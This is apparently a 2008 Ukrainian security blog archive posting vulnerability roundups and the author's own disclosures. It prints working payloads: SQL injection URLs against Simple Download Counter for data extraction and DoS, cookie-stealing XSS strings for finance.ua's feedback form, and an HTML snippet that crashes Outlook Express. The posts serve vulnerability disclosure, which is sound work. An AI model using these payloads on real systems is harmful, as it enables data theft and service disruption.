Архів за Вересень, 2008

Добірка уразливостей

17:39 18.09.2008

В даній добірці уразливості в веб додатках:

  • Multiple PHP remote file inclusion vulnerabilities in Linkliste 1.2 (деталі)
  • Secure Computing - Security Reporter Auth Bypass and Directory Traversal Vulnerability (деталі)
  • Ripe Website Manager SQL Injection and Cross Site Scripting Vulnerabilities (деталі)
  • Firesoft Remote File Inclusion (деталі)
  • Dalai Forum Remote File Inclusion Exploit (деталі)
  • Joomla Component SimpleFAQ V2.11 - Remote SQL Injection (деталі)
  • phpress 0.2.0 (adisplay.php) Remote File Inclusion (деталі)
  • myphotographer image shop script /events/index.asp sql injection (деталі)
  • Olate Download 3.4.2~download.php ~ sql injection (деталі)
  • Olate Download 3.4.2~modules/core/fldm.php~comments tag [url] XSS (деталі)

SQL Injection уразливість в Simple Download Counter

23:57 17.09.2008

Сьогодні я знайшов SQL Injection уразливість в Simple Download Counter. Як раз коли досліджував даний додаток. Про що найближчим часом повідомлю розробнику веб додатку.

SQL Injection:

Дірку можна використати як для отримання інформації (зокрема інших веб додатків) з БД:

http://site/xmlout.php?file='%20union%20select%20*%20from%20table/*
http://site/xmlout.php?file='%20union%20select%201,1%20from%20table/*

Так і для проведення DoS атак:

http://site/xmlout.php?file='%20and%20benchmark(10000000,benchmark(10000000,md5(now())))/*

Атака можлива при magic quotes off. Уразлива версія Simple Download Counter 1.0.

Відео про Authentication Bypass у phpBB

22:43 17.09.2008

Продовжуючи розпочату традицію, після попереднього відео про Blind SQL Injection, пропоную новий відео секюріті мануал. Цього разу відео про Authentication Bypass у phpBB. Рекомендую подивитися всім хто цікавиться цією темою.

phpBB Session Handling Authentication Bypass Demonstration

В даному відео ролику наочно демонструється проведення Authentication Bypass атаки в phpBB для захоплення акаунта адміна. Що цікаво, що випуск свого MustLive Security Pack (в 2005 році) я розпочав зокрема з випуску патча для цієї дірки в phpBB. Рекомендую подивитися дане відео для розуміння векторів атаки через Insufficient Authorization та небезпеки подібних уразливостей.

Уразливості на finance.ua

20:30 17.09.2008

03.04.2008

У вересні, 16.09.2007, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на проекті http://finance.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

17.09.2008

XSS:

POST запит на сторінці http://finance.ua/ru/feedback
"><script>alert(document.cookie)</script>В полях: Ваше имя, Ваш E-mail.

</textarea><script>alert(document.cookie)</script>В полі: Ваше сообщение.

Дані уразливості вже виправлені.

Insufficient Anti-automation:

В контактній формі немає захисту від автоматизованих запитів.

А ось дана уразливість досі не виправлена.

Добірка експлоітів

18:02 17.09.2008

В даній добірці експлоіти в веб додатках:

  • plusPHP URL Shortening Software 1.6 Remote File Inclusion Vulnerability (деталі)
  • RoomPHPlanning 1.5 Arbitrary Add Admin User Vulnerability (деталі)
  • Xomol CMS v1 Login Bypass / LFI Vulnerabilities (деталі)
  • CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability (деталі)
  • RoomPHPlanning 1.5 Multiple Remote SQL Injection Vulnerabilities (деталі)
  • CKGold Shopping Cart 2.5 (category_id) SQL Injection Vulnerability (деталі)
  • RevokeBB 1.0 RC11 (search) Remote SQL Injection Vulnerability (деталі)
  • Joomla Component Artist (idgalery) SQL Injection Vulnerability (деталі)
  • PHPhotoalbum 0.5 Multiple Remote SQL Injection Vulnerabilities (деталі)
  • OtomiGen.X 2.2 (lang) Local File Inclusion Vulnerabilities (деталі)

DoS в Microsoft Outlook

23:52 16.09.2008

Сьогодні я виявив Denial of Service уразливість в Microsoft Outlook. Вразлива версія Outlook 2002 (SP-2) та попередні версії (2002 до SP-2 та вірогідно 2000 та попередні). Наступні версії (2003, 2007) також можуть бути вразливі.

DoS уразливість пов’язана з використанням в стилі html-листа властивості position:relative. Дана уразливість ідентична DoS в Outlook Express, про яку я писав раніше.

Експлоіт:

Для атаки потрібно надіслати html-лист на емайл користувача Outlook, що містить в тілі спеціальний код. Експлоіт такий самий, як і для Outlook Express.

DoS exploit

При перегляді цього листа програму виб’є.

P.S.

Як я вияснив, уразливість знаходиться в бібліотеці mshtml.dll.

Вийшов WordPress 2.6.2

22:48 16.09.2008

На початку місяця, 08.09.2008, вийшла нова версія WordPress 2.6.2 - оновлення для гілки WP 2.6.x.

WordPress 2.6.2 це багфікс та секюріті випуск для 2.6 серії. В ній виправлена уразливість, що могла призвести до захоплення акаунту адміна в WordPress. Це SQL Column Truncation уразливість, що пов’язана з особливостями роботи MySQL, яка в парі з особливостями роботи mt_rand() в PHP, могла використовуватися для отримання пароля адміна.

Також в даній версії було виправлено чимало багів.

Численні уразливості в Apache Tomcat

20:23 16.09.2008

05.08.2008

Виявлені численні уразливості в Apache Tomcat.

Уразливі версії: Apache Tomcat 4.1, Tomcat 5.5, Tomcat 6.0.

Можливий міжсайтовий скриптінг, витік інформації.

12.08.2008

Додаткова інформація.

  • Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability (деталі)

16.09.2008

Додаткова інформація.

  • Apache Tomcat information disclosure vulnerability - Updated (деталі)

Добірка уразливостей

17:34 16.09.2008

В даній добірці уразливості в веб додатках:

DoS в Microsoft Outlook Express

23:56 15.09.2008

Сьогодні я виявив Denial of Service уразливість в Microsoft Outlook Express (для Windows XP). Вразлива версія Outlook Express 6.00.2900.2180 та попередні версії. Windows Mail для Windows Vista також може бути вразливим.

DoS уразливість пов’язана з використанням в стилі html-листа властивості position:relative. Дана атака пов’язна з DoS в Internet Explorer, про яку я писав раніше, бо Outlook Express використовує IE для рендерингу html-листів.

Експлоіт:

Потрібно надіслати html-лист на емайл користувача Outlook Express, що містить в тілі наступний код.
<style>*{position:relative}</style>
<table>DoS</table>

DoS exploit

При перегляді цього листа поштовий клієнт виб’є.

P.S.

Як я вияснив, уразливість знаходиться в бібліотеці mshtml.dll.